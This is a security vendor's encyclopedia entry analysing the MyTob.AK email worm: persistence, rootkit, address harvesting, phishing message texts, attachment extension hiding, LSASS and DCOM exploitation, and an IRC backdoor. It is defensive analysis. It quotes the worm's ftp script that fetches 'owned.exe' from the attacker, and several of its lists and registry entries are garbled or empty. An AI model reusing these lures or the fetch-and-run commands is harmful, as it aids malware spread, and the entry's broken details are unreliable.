Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically


MyTob.AK is a typical mass mailing e-mail worm, the size is approx. 76000 bytes and the worm is runtime compressed by eXpressor, a Romanian executable runtime protector.

Installation and Autostart Techniques

Upon execution, the worm copies itself into the System32 folder as "666.exe". It also drops the component, 666.EXE (8192 bytes in size), in the root directory, which is usually C:\. This dropped component is detected by NOD32 as W32/Mytob.P (MSN Messenger Spreading Component) This component is runtime compressed by UPX.

Mytob.AW creates self-copies directly in the root directory:

"eminem vs 2pac.scr"
"photo album.scr"
"funny pic .scr"

Note: The worm adds the attributes 'read only' and 'hidden' to these files, including the original file from where the worm has been started.

The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

"Windows USB Service" = "666.exe" 

"Windows USB Service" = "666.exe"  

"Windows USB Service" = "666.exe"

MyTob.AK also adds the following registry keys:

"Windows USB Service" = "666.exe"

"Windows USB Service" = "666.exe"

"Windows USB Service" = "666.exe"

"Windows USB Service" = "666.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present anymore.

Rootkit functionality

MyTob.AK drops and executes "winsystem.exe", 19533 bytes in size, in the root directory. This file is FSG packed and detected by NOD32 as "W32/Mytob.W" and represents a rootkit dropper, which is installing "msdirectx.sys" driver to hide worm processes. (see screenshot 1)
This rootkit uses a device driver and a usermode application which can then hide processes, change the privilege of a process/thread, etc. It works on windows NT/2k/XP.
The interface between ring3 (usermode) and ring0 (kernelmode) is done via the IOCTL commands, and it has been defined specifically in the deveice driver code. It would be easy to extend it and make it work more extensive.

Are we lost? Not yet.Netstat still displays the worm activity ( 666.exe ):

The worm creates a mutex "H-E-L-L-B-O-T-3-BY-DIABLO" to avoid multiple running instances of the worm on one machine.

E-mail harvesting

The worm scans all fixed disks and collects e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

However, these extensions are pretty much useless, because the worm has a bug regarding stringcat and compare with the WIN32_FIND_DATA results.
That said: The worm will always open and scan a file for email addresses when at least one character matches one of the characters in the file extension list in the correct order.
In technical terms, that means the worm compares the file extension via 'instring function/substring function'.

Example: The worm will search for e-mail addresses in files where the file extension matches *.htm, *.ht, *.h for instance.

Note: Mytob.AK collects also e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files

DNS resolving

The worm performs DNS e-mail-exchange-queries to find an appropriate mail server for each domain it tries to send itself to. If this DNS request for the mailserver fails, the worm tries to guess the e-mail server adding in front of the domain name the following prefixes:

gate. mx. mail. smtp. mx1. mxs. mail1. relay. ns.

E-mail Sender

The worm generates the sender's e-mail addresses using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

at which it adds randomly, domain names (the domain names are encrypted and stored in the worm):

It uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail subjects

MyTob.AW selects randomly an eMail subject out of the following list:

Server Report
Mail Transaction Failed
Mail Delivery System
Good day

 Note: The e-mail subjects are encrypted and stored in the worm.

Message Body

The e-mail contains one of the following message texts:

Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
The original message was included as an attachment.
Here are your banks documents.

 Note: The worm may also send e-mails containing a blank message body or random strings.

E-mail Attachments

The worm attaches one of the following file names with a self-copy:


with one of the following file extensions:


The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:


 The second extension is chosen from the following list and is separated from the first extension by a huge amount of spaces to hide the executable file extension:


Example: attachment "" may contain the file "text.txt { spaces }.scr"

 The worm avoids e-mail addresses which contain parts of the following list:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley, borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs, google, gov., help, hotmail, iana,, icrosof, icrosoft, ietf, info, inpris, isc.o, isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai, noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe., root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho, spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster, www, you, your, -._!, -._!@

Note: The first missing character should match, for instance, "Microsoft" as well as "microsoft".


Hostfile Manipulation

It overwrites the present host's file with the following data to avoid accessing these sites:

Exploiting technologies

The worm generates random IP addresses and attempts to connect to port 445 of the generated IP's to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using rox.txt FTP-Commands file)

The worm also takes advantage of the DCOM RPC vulnerability [see MS03-026] for spreading.

The rox.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
get owned.exe

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "owned.exe" from the connecting system, and starts this file after downloading.


Other Details:

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer

connects to the following IRC servers:

The worm is able to send copies via MSN Messenger to all online contacts in the contact list.